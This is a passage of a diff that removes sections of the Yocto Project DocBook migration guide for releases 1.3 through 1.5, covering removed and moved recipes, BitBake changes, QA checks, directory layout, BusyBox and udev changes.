-                should now include "splash" instead to enable the boot-up
-                splash screen.
-                Retaining "apps-console-core" will still include the splash
-                screen but generates a warning.
-                The "apps-x11-core" and "apps-x11-games"
-                <filename>IMAGE_FEATURES</filename> features have been removed.
-            </para>
-        </section>
-
-        <section id='migration-1.3-removed-recipes'>
-            <title>Removed Recipes</title>
-
-            <para>
-                The following recipes have been removed.
-                For most of them, it is unlikely that you would have any
-                references to them in your own
-                <link linkend='metadata'>Metadata</link>.
-                However, you should check your metadata against this list to be sure:
-                <itemizedlist>
-                    <listitem><para><emphasis><filename>libx11-trim</filename></emphasis>:
-                        Replaced by <filename>libx11</filename>, which has a negligible
-                        size difference with modern Xorg.</para></listitem>
-                    <listitem><para><emphasis><filename>xserver-xorg-lite</filename></emphasis>:
-                        Use <filename>xserver-xorg</filename>, which has a negligible
-                        size difference when DRI and GLX modules are not installed.</para></listitem>
-                    <listitem><para><emphasis><filename>xserver-kdrive</filename></emphasis>:
-                        Effectively unmaintained for many years.</para></listitem>
-                    <listitem><para><emphasis><filename>mesa-xlib</filename></emphasis>:
-                        No longer serves any purpose.</para></listitem>
-                    <listitem><para><emphasis><filename>galago</filename></emphasis>:
-                        Replaced by telepathy.</para></listitem>
-                    <listitem><para><emphasis><filename>gail</filename></emphasis>:
-                        Functionality was integrated into GTK+ 2.13.</para></listitem>
-                    <listitem><para><emphasis><filename>eggdbus</filename></emphasis>:
-                        No longer needed.</para></listitem>
-                    <listitem><para><emphasis><filename>gcc-*-intermediate</filename></emphasis>:
-                        The build has been restructured to avoid the need for
-                        this step.</para></listitem>
-                    <listitem><para><emphasis><filename>libgsmd</filename></emphasis>:
-                        Unmaintained for many years.
-                        Functionality now provided by
-                        <filename>ofono</filename> instead.</para></listitem>
-                    <listitem><para><emphasis>contacts, dates, tasks, eds-tools</emphasis>:
-                        Largely unmaintained PIM application suite.
-                        It has been moved to <filename>meta-gnome</filename>
-                        in <filename>meta-openembedded</filename>.</para></listitem>
-                </itemizedlist>
-                In addition to the previously listed changes, the
-                <filename>meta-demoapps</filename> directory has also been removed
-                because the recipes in it were not being maintained and many
-                had become obsolete or broken.
-                Additionally, these recipes were not parsed in the default configuration.
-                Many of these recipes are already provided in an updated and
-                maintained form within the OpenEmbedded community layers such as
-                <filename>meta-oe</filename> and <filename>meta-gnome</filename>.
-                For the remainder, you can now find them in the
-                <filename>meta-extras</filename> repository, which is in the
-                Yocto Project
-                <ulink url='&YOCTO_DOCS_OM_URL;#source-repositories'>Source Repositories</ulink>.
-            </para>
-        </section>
-    </section>
-
-    <section id='1.3-linux-kernel-naming'>
-        <title>Linux Kernel Naming</title>
-
-        <para>
-            The naming scheme for kernel output binaries has been changed to
-            now include
-            <link linkend='var-PE'><filename>PE</filename></link> as part of the
-            filename:
-            <literallayout class='monospaced'>
-     KERNEL_IMAGE_BASE_NAME ?= "${KERNEL_IMAGETYPE}-${PE}-${PV}-${PR}-${MACHINE}-${DATETIME}"
-            </literallayout>
-        </para>
-
-        <para>
-            Because the <filename>PE</filename> variable is not set by default,
-            these binary files could result with names that include two dash
-            characters.
-            Here is an example:
-            <literallayout class='monospaced'>
-     bzImage--3.10.9+git0+cd502a8814_7144bcc4b8-r0-qemux86-64-20130830085431.bin
-            </literallayout>
-        </para>
-    </section>
-</section>
-
-<section id='moving-to-the-yocto-project-1.4-release'>
-    <title>Moving to the Yocto Project 1.4 Release</title>
-
-    <para>
-        This section provides migration information for moving to the
-        Yocto Project 1.4 Release from the prior release.
-    </para>
-
-    <section id='migration-1.4-bitbake'>
-        <title>BitBake</title>
-
-        <para>
-            Differences include the following:
-            <itemizedlist>
-                <listitem><para><emphasis>Comment Continuation:</emphasis>
-                    If a comment ends with a line continuation (\) character,
-                    then the next line must also be a comment.
-                    Any instance where this is not the case, now triggers
-                    a warning.
-                    You must either remove the continuation character, or be
-                    sure the next line is a comment.
-                    </para></listitem>
-                <listitem><para><emphasis>Package Name Overrides:</emphasis>
-                    The runtime package specific variables
-                    <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>,
-                    <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>,
-                    <link linkend='var-RSUGGESTS'><filename>RSUGGESTS</filename></link>,
-                    <link linkend='var-RPROVIDES'><filename>RPROVIDES</filename></link>,
-                    <link linkend='var-RCONFLICTS'><filename>RCONFLICTS</filename></link>,
-                    <link linkend='var-RREPLACES'><filename>RREPLACES</filename></link>,
-                    <link linkend='var-FILES'><filename>FILES</filename></link>,
-                    <link linkend='var-ALLOW_EMPTY'><filename>ALLOW_EMPTY</filename></link>,
-                    and the pre, post, install, and uninstall script functions
-                    <filename>pkg_preinst</filename>,
-                    <filename>pkg_postinst</filename>,
-                    <filename>pkg_prerm</filename>, and
-                    <filename>pkg_postrm</filename> should always have a
-                    package name override.
-                    For example, use <filename>RDEPENDS_${PN}</filename> for
-                    the main package instead of <filename>RDEPENDS</filename>.
-                    BitBake uses more strict checks when it parses recipes.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-1.4-build-behavior'>
-        <title>Build Behavior</title>
-
-        <para>
-            Differences include the following:
-            <itemizedlist>
-                <listitem><para><emphasis>Shared State Code:</emphasis>
-                    The shared state code has been optimized to avoid running
-                    unnecessary tasks.
-                    For example, the following no longer populates the target
-                    sysroot since that is not necessary:
-                    <literallayout class='monospaced'>
-     $ bitbake -c rootfs <replaceable>some-image</replaceable>
-                    </literallayout>
-                    Instead, the system just needs to extract the output
-                    package contents, re-create the packages, and construct
-                    the root filesystem.
-                    This change is unlikely to cause any problems unless
-                    you have missing declared dependencies.
-                    </para></listitem>
-                <listitem><para><emphasis>Scanning Directory Names:</emphasis>
-                    When scanning for files in
-                    <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>,
-                    the build system now uses
-                    <link linkend='var-FILESOVERRIDES'><filename>FILESOVERRIDES</filename></link>
-                    instead of <link linkend='var-OVERRIDES'><filename>OVERRIDES</filename></link>
-                    for the directory names.
-                    In general, the values previously in
-                    <filename>OVERRIDES</filename> are now in
-                    <filename>FILESOVERRIDES</filename> as well.
-                    However, if you relied upon an additional value
-                    you previously added to <filename>OVERRIDES</filename>,
-                    you might now need to add it to
-                    <filename>FILESOVERRIDES</filename> unless you are already
-                    adding it through the
-                    <link linkend='var-MACHINEOVERRIDES'><filename>MACHINEOVERRIDES</filename></link>
-                    or <link linkend='var-DISTROOVERRIDES'><filename>DISTROOVERRIDES</filename></link>
-                    variables, as appropriate.
-                    For more related changes, see the
-                    "<link linkend='migration-1.4-variables'>Variables</link>"
-                    section.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-
-    <section id='migration-1.4-proxies-and-fetching-source'>
-        <title>Proxies and Fetching Source</title>
-
-        <para>
-            A new <filename>oe-git-proxy</filename> script has been added to
-            replace previous methods of handling proxies and fetching source
-            from Git.
-            See the <filename>meta-yocto/conf/site.conf.sample</filename> file
-            for information on how to use this script.
-        </para>
-    </section>
-
-    <section id='migration-1.4-custom-interfaces-file-netbase-change'>
-        <title>Custom Interfaces File (netbase change)</title>
-
-        <para>
-            If you have created your own custom
-            <filename>etc/network/interfaces</filename> file by creating
-            an append file for the <filename>netbase</filename> recipe,
-            you now need to create an append file for the
-            <filename>init-ifupdown</filename> recipe instead, which you can
-            find in the
-            <link linkend='source-directory'>Source Directory</link>
-            at <filename>meta/recipes-core/init-ifupdown</filename>.
-            For information on how to use append files, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#using-bbappend-files'>Using .bbappend Files</ulink>"
-            section in the Yocto Project Development Tasks Manual.
-        </para>
-    </section>
-
-    <section id='migration-1.4-remote-debugging'>
-        <title>Remote Debugging</title>
-
-        <para>
-            Support for remote debugging with the Eclipse IDE is now
-            separated into an image feature
-            (<filename>eclipse-debug</filename>) that corresponds to the
-            <filename>packagegroup-core-eclipse-debug</filename> package group.
-            Previously, the debugging feature was included through the
-            <filename>tools-debug</filename> image feature, which corresponds
-            to the <filename>packagegroup-core-tools-debug</filename>
-            package group.
-        </para>
-    </section>
-
-    <section id='migration-1.4-variables'>
-        <title>Variables</title>
-
-        <para>
-            The following variables have changed:
-            <itemizedlist>
-                <listitem><para><emphasis><filename>SANITY_TESTED_DISTROS</filename>:</emphasis>
-                    This variable now uses a distribution ID, which is composed
-                    of the host distributor ID followed by the release.
-                    Previously,
-                    <link linkend='var-SANITY_TESTED_DISTROS'><filename>SANITY_TESTED_DISTROS</filename></link>
-                    was composed of the description field.
-                    For example, "Ubuntu 12.10" becomes "Ubuntu-12.10".
-                    You do not need to worry about this change if you are not
-                    specifically setting this variable, or if you are
-                    specifically setting it to "".
-                    </para></listitem>
-                <listitem><para><emphasis><filename>SRC_URI</filename>:</emphasis>
-                    The <filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}</filename>,
-                    <filename>${</filename><link linkend='var-PF'><filename>PF</filename></link><filename>}</filename>,
-                    <filename>${</filename><link linkend='var-P'><filename>P</filename></link><filename>}</filename>,
-                    and <filename>FILE_DIRNAME</filename> directories have been
-                    dropped from the default value of the
-                    <link linkend='var-FILESPATH'><filename>FILESPATH</filename></link>
-                    variable, which is used as the search path for finding files
-                    referred to in
-                    <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>.
-                    If you have a recipe that relied upon these directories,
-                    which would be unusual, then you will need to add the
-                    appropriate paths within the recipe or, alternatively,
-                    rearrange the files.
-                    The most common locations are still covered by
-                    <filename>${BP}</filename>, <filename>${BPN}</filename>,
-                    and "files", which all remain in the default value of
-                    <link linkend='var-FILESPATH'><filename>FILESPATH</filename></link>.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-target-package-management-with-rpm'>
-        <title>Target Package Management with RPM</title>
-
-        <para>
-            If runtime package management is enabled and the RPM backend
-            is selected, Smart is now installed for package download, dependency
-            resolution, and upgrades instead of Zypper.
-            For more information on how to use Smart, run the following command
-            on the target:
-            <literallayout class='monospaced'>
-     smart --help
-            </literallayout>
-        </para>
-    </section>
-
-    <section id='migration-1.4-recipes-moved'>
-        <title>Recipes Moved</title>
-
-        <para>
-            The following recipes were moved from their previous locations
-            because they are no longer used by anything in
-            the OpenEmbedded-Core:
-            <itemizedlist>
-                <listitem><para><emphasis><filename>clutter-box2d</filename>:</emphasis>
-                    Now resides in the <filename>meta-oe</filename> layer.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>evolution-data-server</filename>:</emphasis>
-                    Now resides in the <filename>meta-gnome</filename> layer.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>gthumb</filename>:</emphasis>
-                    Now resides in the <filename>meta-gnome</filename> layer.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>gtkhtml2</filename>:</emphasis>
-                    Now resides in the <filename>meta-oe</filename> layer.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>gupnp</filename>:</emphasis>
-                    Now resides in the <filename>meta-multimedia</filename> layer.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>gypsy</filename>:</emphasis>
-                    Now resides in the <filename>meta-oe</filename> layer.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>libcanberra</filename>:</emphasis>
-                    Now resides in the <filename>meta-gnome</filename> layer.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>libgdata</filename>:</emphasis>
-                    Now resides in the <filename>meta-gnome</filename> layer.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>libmusicbrainz</filename>:</emphasis>
-                    Now resides in the <filename>meta-multimedia</filename> layer.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>metacity</filename>:</emphasis>
-                    Now resides in the <filename>meta-gnome</filename> layer.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>polkit</filename>:</emphasis>
-                    Now resides in the <filename>meta-oe</filename> layer.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>zeroconf</filename>:</emphasis>
-                    Now resides in the <filename>meta-networking</filename> layer.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-1.4-removals-and-renames'>
-        <title>Removals and Renames</title>
-
-        <para>
-            The following list shows what has been removed or renamed:
-            <itemizedlist>
-                <listitem><para><emphasis><filename>evieext</filename>:</emphasis>
-                    Removed because it has been removed from
-                    <filename>xserver</filename> since 2008.
-                    </para></listitem>
-                <listitem><para><emphasis>Gtk+ DirectFB:</emphasis>
-                    Removed support because upstream Gtk+ no longer supports it
-                    as of version 2.18.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>libxfontcache / xfontcacheproto</filename>:</emphasis>
-                    Removed because they were removed from the Xorg server in 2008.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>libxp / libxprintapputil / libxprintutil / printproto</filename>:</emphasis>
-                    Removed because the XPrint server was removed from
-                    Xorg in 2008.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>libxtrap / xtrapproto</filename>:</emphasis>
-                    Removed because their functionality was broken upstream.
-                    </para></listitem>
-                <listitem><para><emphasis>linux-yocto 3.0 kernel:</emphasis>
-                    Removed with linux-yocto 3.8 kernel being added.
-                    The linux-yocto 3.2 and linux-yocto 3.4 kernels remain
-                    as part of the release.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>lsbsetup</filename>:</emphasis>
-                    Removed with functionality now provided by
-                    <filename>lsbtest</filename>.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>matchbox-stroke</filename>:</emphasis>
-                    Removed because it was never more than a proof-of-concept.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>matchbox-wm-2 / matchbox-theme-sato-2</filename>:</emphasis>
-                    Removed because they are not maintained.
-                    However, <filename>matchbox-wm</filename> and
-                    <filename>matchbox-theme-sato</filename> are still
-                    provided.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>mesa-dri</filename>:</emphasis>
-                    Renamed to <filename>mesa</filename>.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>mesa-xlib</filename>:</emphasis>
-                    Removed because it was no longer useful.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>mutter</filename>:</emphasis>
-                    Removed because nothing ever uses it and the recipe is
-                    very old.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>orinoco-conf</filename>:</emphasis>
-                    Removed because it has become obsolete.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>update-modules</filename>:</emphasis>
-                    Removed because it is no longer used.
-                    The kernel module <filename>postinstall</filename> and
-                    <filename>postrm</filename> scripts can now do the same
-                    task without the use of this script.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>web</filename>:</emphasis>
-                    Removed because it is not maintained.  Superseded by
-                    <filename>web-webkit</filename>.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>xf86bigfontproto</filename>:</emphasis>
-                    Removed because upstream it has been disabled by default
-                    since 2007.
-                    Nothing uses <filename>xf86bigfontproto</filename>.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>xf86rushproto</filename>:</emphasis>
-                    Removed because its dependency in
-                    <filename>xserver</filename> was spurious and it was
-                    removed in 2005.
-                    </para></listitem>
-                <listitem><para><emphasis><filename>zypper / libzypp / sat-solver</filename>:</emphasis>
-                    Removed and been functionally replaced with Smart
-                    (<filename>python-smartpm</filename>) when RPM packaging
-                    is used and package management is enabled on the target.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-</section>
-
-<section id='moving-to-the-yocto-project-1.5-release'>
-    <title>Moving to the Yocto Project 1.5 Release</title>
-
-    <para>
-        This section provides migration information for moving to the
-        Yocto Project 1.5 Release from the prior release.
-    </para>
-
-    <section id='migration-1.5-host-dependency-changes'>
-        <title>Host Dependency Changes</title>
-
-        <para>
-            The OpenEmbedded build system now has some additional requirements
-            on the host system:
-            <itemizedlist>
-                <listitem><para>Python 2.7.3+</para></listitem>
-                <listitem><para>Tar 1.24+</para></listitem>
-                <listitem><para>Git 1.7.8+</para></listitem>
-                <listitem><para>Patched version of Make if you are using
-                    3.82.
-                    Most distributions that provide Make 3.82 use the patched
-                    version.</para></listitem>
-            </itemizedlist>
-            If the Linux distribution you are using on your build host
-            does not provide packages for these, you can install and use
-            the Buildtools tarball, which provides an SDK-like environment
-            containing them.
-        </para>
-
-        <para>
-            For more information on this requirement, see the
-            "<link linkend='required-git-tar-python-and-gcc-versions'>Required Git, tar, Python and gcc Versions</link>"
-            section.
-        </para>
-    </section>
-
-    <section id='migration-1.5-atom-pc-bsp'>
-        <title><filename>atom-pc</filename> Board Support Package (BSP)</title>
-
-        <para>
-            The <filename>atom-pc</filename> hardware reference BSP has been
-            replaced by a <filename>genericx86</filename> BSP.
-            This BSP is not necessarily guaranteed to work on all x86
-            hardware, but it will run on a wider range of systems than the
-            <filename>atom-pc</filename> did.
-            <note>
-                Additionally, a <filename>genericx86-64</filename> BSP has
-                been added for 64-bit Atom systems.
-            </note>
-        </para>
-    </section>
-
-    <section id='migration-1.5-bitbake'>
-        <title>BitBake</title>
-
-        <para>
-            The following changes have been made that relate to BitBake:
-            <itemizedlist>
-                <listitem><para>
-                    BitBake now supports a <filename>_remove</filename>
-                    operator.
-                    The addition of this operator means you will have to
-                    rename any items in recipe space (functions, variables)
-                    whose names currently contain
-                    <filename>_remove_</filename> or end with
-                    <filename>_remove</filename> to avoid unexpected behavior.
-                    </para></listitem>
-                <listitem><para>
-                    BitBake's global method pool has been removed.
-                    This method is not particularly useful and led to clashes
-                    between recipes containing functions that had the
-                    same name.</para></listitem>
-                <listitem><para>
-                    The "none" server backend has been removed.
-                    The "process" server backend has been serving well as the
-                    default for a long time now.</para></listitem>
-                <listitem><para>
-                    The <filename>bitbake-runtask</filename> script has been
-                    removed.</para></listitem>
-                <listitem><para>
-                    <filename>${</filename><link linkend='var-P'><filename>P</filename></link><filename>}</filename>
-                    and
-                    <filename>${</filename><link linkend='var-PF'><filename>PF</filename></link><filename>}</filename>
-                    are no longer added to
-                    <link linkend='var-PROVIDES'><filename>PROVIDES</filename></link>
-                    by default in <filename>bitbake.conf</filename>.
-                    These version-specific <filename>PROVIDES</filename>
-                    items were seldom used.
-                    Attempting to use them could result in two versions being
-                    built simultaneously rather than just one version due to
-                    the way BitBake resolves dependencies.</para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-1.5-qa-warnings'>
-        <title>QA Warnings</title>
-
-        <para>
-            The following changes have been made to the package QA checks:
-            <itemizedlist>
-                <listitem><para>
-                    If you have customized
-                    <link linkend='var-ERROR_QA'><filename>ERROR_QA</filename></link>
-                    or <link linkend='var-WARN_QA'><filename>WARN_QA</filename></link>
-                    values in your configuration, check that they contain all of
-                    the issues that you wish to be reported.
-                    Previous Yocto Project versions contained a bug that meant
-                    that any item not mentioned in <filename>ERROR_QA</filename>
-                    or <filename>WARN_QA</filename> would be treated as a
-                    warning.
-                    Consequently, several important items were not already in
-                    the default value of <filename>WARN_QA</filename>.
-                    All of the possible QA checks are now documented in the
-                    "<link linkend='ref-classes-insane'><filename>insane.bbclass</filename></link>"
-                    section.</para></listitem>
-                <listitem><para>
-                    An additional QA check has been added to check if
-                    <filename>/usr/share/info/dir</filename> is being installed.
-                    Your recipe should delete this file within
-                    <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-                    if "make install" is installing it.
-                    </para></listitem>
-                <listitem><para>
-                    If you are using the buildhistory class, the check for the
-                    package version going backwards is now controlled using a
-                    standard QA check.
-                    Thus, if you have customized your
-                    <filename>ERROR_QA</filename> or
-                    <filename>WARN_QA</filename> values and still wish to have
-                    this check performed, you should add
-                    "version-going-backwards" to your value for one or the
-                    other variables depending on how you wish it to be handled.
-                    See the documented QA checks in the
-                    "<link linkend='ref-classes-insane'><filename>insane.bbclass</filename></link>"
-                    section.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-1.5-directory-layout-changes'>
-        <title>Directory Layout Changes</title>
-
-        <para>
-            The following directory changes exist:
-            <itemizedlist>
-                <listitem><para>
-                    Output SDK installer files are now named to include the
-                    image name and tuning architecture through the
-                    <link linkend='var-SDK_NAME'><filename>SDK_NAME</filename></link>
-                    variable.</para></listitem>
-                <listitem><para>
-                    Images and related files are now installed into a directory
-                    that is specific to the machine, instead of a parent
-                    directory containing output files for multiple machines.
-                    The
-                    <link linkend='var-DEPLOY_DIR_IMAGE'><filename>DEPLOY_DIR_IMAGE</filename></link>
-                    variable continues to point to the directory containing
-                    images for the current
-                    <link linkend='var-MACHINE'><filename>MACHINE</filename></link>
-                    and should be used anywhere there is a need to refer to
-                    this directory.
-                    The <filename>runqemu</filename> script now uses this
-                    variable to find images and kernel binaries and will use
-                    BitBake to determine the directory.
-                    Alternatively, you can set the
-                    <filename>DEPLOY_DIR_IMAGE</filename> variable in the
-                    external environment.</para></listitem>
-                <listitem><para>
-                    When buildhistory is enabled, its output is now written
-                    under the
-                    <link linkend='build-directory'>Build Directory</link>
-                    rather than
-                    <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>.
-                    Doing so makes it easier to delete
-                    <filename>TMPDIR</filename> and preserve the build history.
-                    Additionally, data for produced SDKs is now split by
-                    <link linkend='var-IMAGE_NAME'><filename>IMAGE_NAME</filename></link>.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>pkgdata</filename> directory produced as
-                    part of the packaging process has been collapsed into a
-                    single machine-specific directory.
-                    This directory is located under
-                    <filename>sysroots</filename> and uses a machine-specific
-                    name (i.e.
-                    <filename>tmp/sysroots/<replaceable>machine</replaceable>/pkgdata</filename>).
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-1.5-shortened-git-srcrev-values'>
-        <title>Shortened Git <filename>SRCREV</filename> Values</title>
-
-        <para>
-            BitBake will now shorten revisions from Git repositories from the
-            normal 40 characters down to 10 characters within
-            <link linkend='var-SRCPV'><filename>SRCPV</filename></link>
-            for improved usability in path and file names.
-            This change should be safe within contexts where these revisions
-            are used because the chances of spatially close collisions
-            is very low.
-            Distant collisions are not a major issue in the way
-            the values are used.
-        </para>
-    </section>
-
-    <section id='migration-1.5-image-features'>
-        <title><filename>IMAGE_FEATURES</filename></title>
-
-        <para>
-            The following changes have been made that relate to
-            <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>:
-            <itemizedlist>
-                <listitem><para>
-                    The value of <filename>IMAGE_FEATURES</filename> is now
-                    validated to ensure invalid feature items are not added.
-                    Some users mistakenly add package names to this variable
-                    instead of using
-                    <link linkend='var-IMAGE_INSTALL'><filename>IMAGE_INSTALL</filename></link>
-                    in order to have the package added to the image, which does
-                    not work.
-                    This change is intended to catch those kinds of situations.
-                    Valid <filename>IMAGE_FEATURES</filename> are drawn from
-                    <filename>PACKAGE_GROUP</filename> definitions,
-                    <link linkend='var-COMPLEMENTARY_GLOB'><filename>COMPLEMENTARY_GLOB</filename></link>
-                    and a new "validitems" varflag on
-                    <filename>IMAGE_FEATURES</filename>.
-                    The "validitems" varflag change allows additional features
-                    to be added if they are not provided using the previous
-                    two mechanisms.
-                    </para></listitem>
-                <listitem><para>
-                    The previously deprecated "apps-console-core"
-                    <filename>IMAGE_FEATURES</filename> item is no longer
-                    supported.
-                    Add "splash" to <filename>IMAGE_FEATURES</filename> if you
-                    wish to have the splash screen enabled, since this is
-                    all that apps-console-core was doing.</para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-1.5-run'>
-        <title><filename>/run</filename></title>
-
-        <para>
-            The <filename>/run</filename> directory from the Filesystem
-            Hierarchy Standard 3.0 has been introduced.
-            You can find some of the implications for this change
-            <ulink url='http://cgit.openembedded.org/openembedded-core/commit/?id=0e326280a15b0f2c4ef2ef4ec441f63f55b75873'>here</ulink>.
-            The change also means that recipes that install files to
-            <filename>/var/run</filename> must be changed.
-            You can find a guide on how to make these changes
-            <ulink url='http://permalink.gmane.org/gmane.comp.handhelds.openembedded/58530'>here</ulink>.
-        </para>
-    </section>
-
-    <section id='migration-1.5-removal-of-package-manager-database-within-image-recipes'>
-        <title>Removal of Package Manager Database Within Image Recipes</title>
-
-        <para>
-            The image <filename>core-image-minimal</filename> no longer adds
-            <filename>remove_packaging_data_files</filename> to
-            <link linkend='var-ROOTFS_POSTPROCESS_COMMAND'><filename>ROOTFS_POSTPROCESS_COMMAND</filename></link>.
-            This addition is now handled automatically when "package-management"
-            is not in
-            <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>.
-            If you have custom image recipes that make this addition,
-            you should remove the lines, as they are not needed and might
-            interfere with correct operation of postinstall scripts.
-        </para>
-    </section>
-
-    <section id='migration-1.5-images-now-rebuild-only-on-changes-instead-of-every-time'>
-        <title>Images Now Rebuild Only on Changes Instead of Every Time</title>
-
-        <para>
-            The
-            <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>
-            and other related image
-            construction tasks are no longer marked as "nostamp".
-            Consequently, they will only be re-executed when their inputs have
-            changed.
-            Previous versions of the OpenEmbedded build system always rebuilt
-            the image when requested rather when necessary.
-        </para>
-    </section>
-
-    <section id='migration-1.5-task-recipes'>
-        <title>Task Recipes</title>
-
-        <para>
-            The previously deprecated <filename>task.bbclass</filename> has
-            now been dropped.
-            For recipes that previously inherited from this class, you should
-            rename them from <filename>task-*</filename> to
-            <filename>packagegroup-*</filename> and inherit packagegroup
-            instead.
-        </para>
-
-        <para>
-            For more information, see the
-            "<link linkend='ref-classes-packagegroup'><filename>packagegroup.bbclass</filename></link>"
-            section.
-        </para>
-    </section>
-
-    <section id='migration-1.5-busybox'>
-        <title>BusyBox</title>
-
-        <para>
-            By default, we now split BusyBox into two binaries:
-            one that is suid root for those components that need it, and
-            another for the rest of the components.
-            Splitting BusyBox allows for optimization that eliminates the
-            <filename>tinylogin</filename> recipe as recommended by upstream.
-            You can disable this split by setting
-            <link linkend='var-BUSYBOX_SPLIT_SUID'><filename>BUSYBOX_SPLIT_SUID</filename></link>
-            to "0".
-        </para>
-    </section>
-
-    <section id='migration-1.5-automated-image-testing'>
-        <title>Automated Image Testing</title>
-
-        <para>
-            A new automated image testing framework has been added
-            through the
-            <link linkend='ref-classes-testimage*'><filename>testimage.bbclass</filename></link>
-            class.
-            This framework replaces the older
-            <filename>imagetest-qemu</filename> framework.
-        </para>
-
-        <para>
-            You can learn more about performing automated image tests in the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#performing-automated-runtime-testing'>Performing Automated Runtime Testing</ulink>"
-            section in the Yocto Project Development Tasks Manual.
-        </para>
-    </section>
-
-    <section id='migration-1.5-build-history'>
-        <title>Build History</title>
-
-        <para>
-            Following are changes to Build History:
-            <itemizedlist>
-                <listitem><para>
-                     Installed package sizes:
-                     <filename>installed-package-sizes.txt</filename> for an
-                     image now records the size of the files installed by each
-                     package instead of the size of each compressed package
-                     archive file.</para></listitem>
-                <listitem><para>
-                    The dependency graphs (<filename>depends*.dot</filename>)
-                    now use the actual package names instead of replacing
-                    dashes, dots and plus signs with underscores.
-                    </para></listitem>
-                <listitem><para>
-                    The <filename>buildhistory-diff</filename> and
-                    <filename>buildhistory-collect-srcrevs</filename>
-                    utilities have improved command-line handling.
-                    Use the <filename>--help</filename> option for
-                    each utility for more information on the new syntax.
-                    </para></listitem>
-            </itemizedlist>
-            For more information on Build History, see the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-build-output-quality'>Maintaining Build Output Quality</ulink>"
-            section in the Yocto Project Development Tasks Manual.
-        </para>
-    </section>
-
-    <section id='migration-1.5-udev'>
-        <title><filename>udev</filename></title>
-
-        <para>
-            Following are changes to <filename>udev</filename>:
-            <itemizedlist>
-                <listitem><para>
-                    <filename>udev</filename> no longer brings in
-                    <filename>udev-extraconf</filename> automatically
-                    through
-                    <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>,
-                    since this was originally intended to be optional.
-                    If you need the extra rules, then add
-                    <filename>udev-extraconf</filename> to your image.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>udev</filename> no longer brings in
-                    <filename>pciutils-ids</filename> or
-                    <filename>usbutils-ids</filename> through
-                    <filename>RRECOMMENDS</filename>.
-                    These are not needed by <filename>udev</filename> itself
-                    and removing them saves around 350KB.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='migration-1.5-removed-renamed-recipes'>
-        <title>Removed and Renamed Recipes</title>
-
-        <itemizedlist>
-            <listitem><para>
-                The <filename>linux-yocto</filename> 3.2 kernel has been
-                removed.</para></listitem>
-            <listitem><para>
-                <filename>libtool-nativesdk</filename> has been renamed to
-                <filename>nativesdk-libtool</filename>.</para></listitem>
-            <listitem><para>
-                <filename>tinylogin</filename> has been removed.
-                It has been replaced by a suid portion of Busybox.
-                See the
-                "<link linkend='migration-1.5-busybox'>BusyBox</link>" section
-                for more information.</para></listitem>
-            <listitem><para>
-                <filename>external-python-tarball</filename> has been renamed
-                to <filename>buildtools-tarball</filename>.
-                </para></listitem>
-            <listitem><para>
-                <filename>web-webkit</filename> has been removed.
-                It has been functionally replaced by
-                <filename>midori</filename>.</para></listitem>
-            <listitem><para>
-                <filename>imake</filename> has been removed.
-                It is no longer needed by any other recipe.
-                </para></listitem>
-            <listitem><para>
-                <filename>transfig-native</filename> has been removed.
-                It is no longer needed by any other recipe.
-                </para></listitem>
-            <listitem><para>
-                <filename>anjuta-remote-run</filename> has been removed.
-                Anjuta IDE integration has not been officially supported for
-                several releases.</para></listitem>
-        </itemizedlist>
-    </section>
-
-    <section id='migration-1.5-other-changes'>
-        <title>Other Changes</title>
-
-        <para>
-            Following is a list of short entries describing other changes:
-            <itemizedlist>
-                <listitem><para>
-                    <filename>run-postinsts</filename>: Make this generic.
-                    </para></listitem>
-                <listitem><para>
